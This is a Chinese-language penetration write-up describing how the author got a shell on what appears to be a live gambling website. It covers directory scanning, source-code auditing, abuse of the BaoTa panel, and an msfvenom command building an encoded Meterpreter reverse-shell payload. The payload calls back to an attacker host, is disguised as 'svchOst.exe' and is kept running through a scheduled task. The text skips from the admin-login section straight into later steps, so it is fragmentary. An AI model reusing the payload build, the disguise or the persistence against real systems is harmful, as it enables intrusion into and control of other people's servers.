一次BC站点的GetShell过程

0x00 前言 bc实战代码审计拿下后台、数据库续这篇文章作者并没有成功GetShell，依稀记得以前遇到一个类似的站点，故打算再续前缘，最终成功拿下目标Shell权限 0x01 获取源码 首先先常规扫一波目录： dirsearch -u 'http://x.x.x.x:80/' -e php 并没有发现有源码压缩包，故放弃这个思路，重新审视文章，获取关键字，去github进行搜索，成功找到部分源码，然后开始进行审计。 Github： 0x02 进入后台 通过之前的扫描，可以获取到后台登陆地址。 访问可以看到登陆页面。 没有验证么，果断上一波常规的弱口令FUZZ，无果。那么只能通过源码进行突破了，首先观察网站的后台鉴权逻辑主要是通过包含common/login_check.php进行判断。 已安装，删除禁用函数，来实现命令执行。 2) 通过宝塔自带的计划任务。MSF生成木马 msfvenom -p windows/meterpreter/reverse_tcp  -e x86/shikata_ga_nai -i 5  LHOST=x.x.x.x LPORT=10001 EXTENSIONS=stdapi,priv  -f exe > svchOst.exe 放到C盘即可，然后添加shell计划任务 ipconfig /all 查看网络状态 简单查看下arp -a和扫描下内网网段的存活情况，并没有连通，故没有继续后续的内网集群智慧云安服渗透测试。 0x05 总结 本文的渗透过程比较常规，涵盖了从0到1的完整单目标渗透过程，核心在于快速的代码审计能力，由于这个系统开发比较凌乱，所以故不能采用框架的方式去阅读，故采用危险函数定位是一种有效的方法，最后通过利用宝塔的信息，成功获取到最高的权限，完成集群智慧云安服渗透测试的目标。 文章来源：奇安信攻防社区（xq17） 原文地址：https://forum.butian.net/share/1225排版：潇湘信安 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！ 如侵权请私聊我们删文 END